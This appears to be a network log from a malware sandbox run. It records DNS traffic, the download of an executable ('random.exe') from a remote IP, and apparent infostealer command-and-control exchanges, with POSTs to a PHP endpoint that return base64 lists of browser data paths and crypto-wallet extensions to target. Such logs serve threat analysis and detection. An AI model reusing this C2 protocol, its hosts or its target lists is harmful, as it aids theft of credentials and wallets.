Nov 5, 2024 10:13:43.334182024 CET	1.1.1.1	192.168.2.5	0xd871	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 10:13:45.152667999 CET	1.1.1.1	192.168.2.5	0xa946	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 10:13:45.153712988 CET	1.1.1.1	192.168.2.5	0x15de	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 10:13:45.155133009 CET	1.1.1.1	192.168.2.5	0x1a43	No error (0)	sb.scorecardresearch.com		18.244.18.38	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:13:45.155133009 CET	1.1.1.1	192.168.2.5	0x1a43	No error (0)	sb.scorecardresearch.com		18.244.18.32	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:13:45.155133009 CET	1.1.1.1	192.168.2.5	0x1a43	No error (0)	sb.scorecardresearch.com		18.244.18.122	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:13:45.155133009 CET	1.1.1.1	192.168.2.5	0x1a43	No error (0)	sb.scorecardresearch.com		18.244.18.27	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:13:45.191658020 CET	1.1.1.1	192.168.2.5	0x3dbd	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 10:13:45.191807985 CET	1.1.1.1	192.168.2.5	0xb624	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 10:13:45.203764915 CET	1.1.1.1	192.168.2.5	0x2299	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 10:13:45.203852892 CET	1.1.1.1	192.168.2.5	0x5920	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 10:13:45.401844025 CET	1.1.1.1	192.168.2.5	0x61f	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 10:13:45.401844025 CET	1.1.1.1	192.168.2.5	0x61f	No error (0)	googlehosted.l.googleusercontent.com		142.250.186.129	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:13:45.402518988 CET	1.1.1.1	192.168.2.5	0xdad2	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 10:13:46.690371990 CET	1.1.1.1	192.168.2.5	0xbb03	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:13:46.690371990 CET	1.1.1.1	192.168.2.5	0xbb03	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:13:46.690437078 CET	1.1.1.1	192.168.2.5	0xc2aa	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 5, 2024 10:13:46.691160917 CET	1.1.1.1	192.168.2.5	0xf86f	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:13:46.691160917 CET	1.1.1.1	192.168.2.5	0xf86f	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:13:46.691278934 CET	1.1.1.1	192.168.2.5	0x60cd	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 5, 2024 10:13:46.700287104 CET	1.1.1.1	192.168.2.5	0xb7ac	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:13:46.700287104 CET	1.1.1.1	192.168.2.5	0xb7ac	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:13:46.700562000 CET	1.1.1.1	192.168.2.5	0xec37	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 10:13:12.215473890 CET	205	OUT	GET /steam/random.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Nov 5, 2024 10:13:13.183135986 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 09:13:13 GMT Content-Type: application/octet-stream Content-Length: 2123264 Last-Modified: Tue, 05 Nov 2024 08:48:16 GMT Connection: keep-alive ETag: "6729dbd0-206600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 20 72 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 72 00 00 04 00 00 5a eb 20 00 02 00 40 80 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$b}...u^..uk..u_..{v..fz/.{f....uZ..uh..Rich.PEL8ng, r@PrZ @P.d. p.v@.rsrc .@.idata .@ ).@ajclbkkePX@yhxmvaoer@ @.taggant0 r"D @
Nov 5, 2024 10:13:13.183161020 CET	112	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 10:13:13.183267117 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 10:13:13.183278084 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 10:13:13.183290005 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 10:13:13.183353901 CET	1236	IN	Data Raw: 8d 45 62 3f 01 bc c5 f7 9c 05 a7 27 d4 33 f9 9c ff e1 a6 a5 99 c3 84 bc 09 a2 59 93 5d 91 d3 54 94 63 9c 8b 1b 16 46 ca 2e bc e0 6c b2 0a 42 85 14 d6 ff e5 d2 cb fa a5 53 ae 5b de 91 b1 d3 ad b2 74 b8 79 9e 1e 38 1a 76 25 e4 25 d9 75 b1 15 b1 36 Data Ascii: Eb?'3Y]TcF.lBS[ty8v%%u6XRnb4(B1{t+n)Jx_XABi)Ca{>^:i@:KNKNKNKNKNKNKNKNKOe5BhNrlv0rXF@
Nov 5, 2024 10:13:13.183366060 CET	1236	IN	Data Raw: 13 a4 29 a2 80 5e b3 8a cf d9 ca 53 78 a6 49 5c 7d 3a 39 e3 b0 ca 00 8b c8 72 bd bd bf e4 21 7d 27 0a 0e d7 c9 83 13 3e 75 bd d0 34 17 b2 1f 88 d4 cd e4 73 c8 74 3d f3 b4 a9 e7 b8 84 0e 16 b2 8f 78 79 82 a1 0e ce 02 c1 1b 0a 3f 36 0c d3 37 6a 35 Data Ascii: )^SxI\}:9r!}'>u4st=xy?67j5G`&RjWt"sGqS30;=JhN4zJ;'}ZHf@Nimb$q~C69 MM'bkA/l=zIb_^dY$6\#
Nov 5, 2024 10:13:13.183377028 CET	1060	IN	Data Raw: d2 a8 c1 95 d7 9a ca 06 15 d7 38 bc 8f 76 cb 75 db ab 2d 03 ff 3b dc c4 c8 a1 d1 5f ef 6b 87 1e 1f aa 29 12 80 4a da 7d 15 70 f6 65 ca 3e 26 8a 03 a8 f2 6a 5f 88 f3 8b 29 29 d1 8a 77 2f c5 3c 17 5d 4b 5a 47 88 ca a3 98 cf ce 3f b3 72 3d 97 f5 b6 Data Ascii: 8vu-;_k)J}pe>&j_))w/<]KZG?r=h@QwvjR"f#wMaoHg;oAwY^>$^UPoRCPC:=6wY!K5l8>Cx$?yW9Ht\mZ
Nov 5, 2024 10:13:13.183387041 CET	1236	IN	Data Raw: 9f 8a 2d 95 83 81 3d 8b 17 4a e4 17 8a cb 51 03 19 b0 6d eb 81 be 9d 36 71 bb 02 17 f6 6b 68 9b 47 a1 e3 df 8b f9 5a ef f3 3a d9 e0 a9 a1 62 63 99 06 eb 4f d0 98 9a 62 99 ba 25 8a 06 58 e2 df cd 79 c2 8a 59 b9 27 8f ab 25 cb 56 a7 88 ca 4b 9a c2 Data Ascii: -=JQm6qkhGZ:bcOb%XyY'%VK).#N&x} Q7*l"%?+66\lS+Cv%<jRZK)o2Pu[~i<GvYJ!br1N 8iksP[l;J
Nov 5, 2024 10:13:13.183398008 CET	1236	IN	Data Raw: 3e 88 e0 73 80 92 5f 96 07 5c b8 68 a9 8f e1 8a 9a 3c 14 53 d2 a9 a9 ba 6b 8e 40 ad cb 8c 7f 5e ba 68 d2 73 8c 96 d9 8a 48 d5 16 0b 4f 8e 42 8a af b6 99 00 c0 c2 4f 3d d7 a1 d1 53 ef 1f 86 86 7a f0 28 12 80 4e da 09 15 7f 92 fe 67 3e 43 8a 03 b6 Data Ascii: >s_\h<Sk@^hsHOBO=Sz(Ng>C.zv#sPu?je&IefW6<WGM_^sFU<17N>h@6Ni?K`6M@)yPSuOk~k?9u;o\
Nov 5, 2024 10:13:13.190152884 CET	1236	IN	Data Raw: 81 08 b7 96 bb ca bc 46 cc 2a 79 1c 5d c6 34 c8 99 de 26 34 c0 64 09 5d a3 c8 01 f7 d8 d6 cc fb fd bb 58 2f ed 75 ee 06 95 f2 59 24 2f bc 89 f6 7c 94 79 72 6f b3 ab 42 46 0e 8e ee 63 5b 09 c7 9f 31 6e 81 69 4d 6b 1c 2f a7 66 eb 84 48 b2 be 77 3d Data Ascii: F*y]4&4d]X/uY$/\|yroBFc[1niMk/fHw=4WJ!`lv^w.6T.{~GBM?S-/8</imBb\2fC].9ZX2M:B]5%^'7:"5>8q

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 10:13:19.668760061 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 5, 2024 10:13:20.567869902 CET	203	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 09:13:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 5, 2024 10:13:20.570712090 CET	413	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AECAKJJECAEGCBGDHDHC Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 4a 4a 45 43 41 45 47 43 42 47 44 48 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 46 41 46 41 35 33 42 33 35 33 38 31 38 30 36 39 37 30 37 35 32 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 4a 4a 45 43 41 45 47 43 42 47 44 48 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 4a 4a 45 43 41 45 47 43 42 47 44 48 44 48 43 2d 2d 0d 0a Data Ascii: ------AECAKJJECAEGCBGDHDHCContent-Disposition: form-data; name="hwid"1FAFA53B35381806970752------AECAKJJECAEGCBGDHDHCContent-Disposition: form-data; name="build"tale------AECAKJJECAEGCBGDHDHC--
Nov 5, 2024 10:13:20.861737013 CET	407	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 09:13:20 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4e 6d 4e 6b 59 6a 41 34 5a 44 63 79 4e 6a 42 6d 4e 7a 41 79 4e 47 56 6c 4e 57 4d 7a 4f 44 5a 69 4f 54 6c 68 4d 44 42 6b 5a 57 46 6c 59 54 55 33 4d 6a 52 6c 4d 54 64 6d 4e 47 45 7a 4e 54 6b 77 4f 44 6b 7a 4d 47 59 79 4d 6d 4a 68 4d 32 4a 6b 4e 47 49 35 59 54 67 77 4d 54 64 69 59 7a 4d 77 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: NmNkYjA4ZDcyNjBmNzAyNGVlNWMzODZiOTlhMDBkZWFlYTU3MjRlMTdmNGEzNTkwODkzMGYyMmJhM2JkNGI5YTgwMTdiYzMwfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Nov 5, 2024 10:13:20.862698078 CET	470	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIECFBAAAFHIIDGCGCBF Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 49 45 43 46 42 41 41 41 46 48 49 49 44 47 43 47 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 63 64 62 30 38 64 37 32 36 30 66 37 30 32 34 65 65 35 63 33 38 36 62 39 39 61 30 30 64 65 61 65 61 35 37 32 34 65 31 37 66 34 61 33 35 39 30 38 39 33 30 66 32 32 62 61 33 62 64 34 62 39 61 38 30 31 37 62 63 33 30 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 43 46 42 41 41 41 46 48 49 49 44 47 43 47 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 43 46 42 41 41 41 46 48 49 49 44 47 43 47 43 42 46 2d 2d 0d 0a Data Ascii: ------FIECFBAAAFHIIDGCGCBFContent-Disposition: form-data; name="token"6cdb08d7260f7024ee5c386b99a00deaea5724e17f4a35908930f22ba3bd4b9a8017bc30------FIECFBAAAFHIIDGCGCBFContent-Disposition: form-data; name="message"browsers------FIECFBAAAFHIIDGCGCBF--
Nov 5, 2024 10:13:21.142770052 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 09:13:20 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2064 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 58 45 64 76 62 32 64 73 5a 56 78 63 51 32 68 79 62 32 31 6c 58 46 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 63 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4d 48 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 57 31 70 5a 32 39 38 58 45 46 74 61 57 64 76 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcXFByb2dyYW0gRmlsZXNcXEdvb2dsZVxcQ2hyb21lXFxBcHBsaWNhdGlvblxcfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8MHxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8QW1pZ298XEFtaWdvXFVzZXIgRGF0YXxjaHJvbWV8MHwwfFRvcmNofFxUb3JjaFxVc2VyIERhdGF8Y2hyb21lfDB8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8JUxPQ0FMQVBQREFUQSVcXFZpdmFsZGlcXEFwcGxpY2F0aW9uXFx8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8MHxFcGljUHJpdmFjeUJyb3dzZXJ8XEVwaWMgUHJpdmFjeSBCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8ZXBpYy5leGV8JUxPQ0FMQVBQREFUQSVcXEVwaWMgUHJpdmFjeSBCcm93c2VyXFxBcHBsaWNhdGlvblxcfENvY0NvY3xcQ29jQ29jXEJyb3dzZXJcVXNlciBEYXRhfGNocm9tZXxicm93c2VyLmV4ZXxDOlxcUHJvZ3JhbSBGaWxlc1xcQ29jQ29jXFxCcm93c2VyXFxBcHBsaWNhdGlvblxcfEJyYXZlfFxCcmF2ZVNvZnR3YXJlXEJyYXZlLUJyb3dzZXJcVXNlciBEYXRhfGNocm9tZXxicmF2ZS5leGV8QzpcXFByb2dyYW0gRmlsZXNcXEJyYXZlU29mdHdhcmVcXEJyYXZlLUJyb3dz
Nov 5, 2024 10:13:21.142818928 CET	1056	IN	Data Raw: 5a 58 4a 63 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 46 78 38 51 32 56 75 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 Data Ascii: ZXJcXEFwcGxpY2F0aW9uXFx8Q2VudCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcXENlbnRCcm93c2VyXFxBcHBsaWNhdGlvblxcfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXI
Nov 5, 2024 10:13:21.143963099 CET	469	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKKFHDAKECFHIDHJDAAA Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 46 48 44 41 4b 45 43 46 48 49 44 48 4a 44 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 63 64 62 30 38 64 37 32 36 30 66 37 30 32 34 65 65 35 63 33 38 36 62 39 39 61 30 30 64 65 61 65 61 35 37 32 34 65 31 37 66 34 61 33 35 39 30 38 39 33 30 66 32 32 62 61 33 62 64 34 62 39 61 38 30 31 37 62 63 33 30 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 46 48 44 41 4b 45 43 46 48 49 44 48 4a 44 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 46 48 44 41 4b 45 43 46 48 49 44 48 4a 44 41 41 41 2d 2d 0d 0a Data Ascii: ------AKKFHDAKECFHIDHJDAAAContent-Disposition: form-data; name="token"6cdb08d7260f7024ee5c386b99a00deaea5724e17f4a35908930f22ba3bd4b9a8017bc30------AKKFHDAKECFHIDHJDAAAContent-Disposition: form-data; name="message"plugins------AKKFHDAKECFHIDHJDAAA--
Nov 5, 2024 10:13:21.423652887 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 09:13:21 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Nov 5, 2024 10:13:21.423670053 CET	112	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtp
Nov 5, 2024 10:13:21.423913002 CET	1236	IN	Data Raw: 63 47 68 6c 5a 57 6c 71 61 57 31 6b 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64 6a 5a 47 5a 6f 61 47 4a 6b 5a 47 4e 6e 61 47 46 6a 61 47 74 6c 61 6d 56 68 63 48 Data Ascii: cGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9
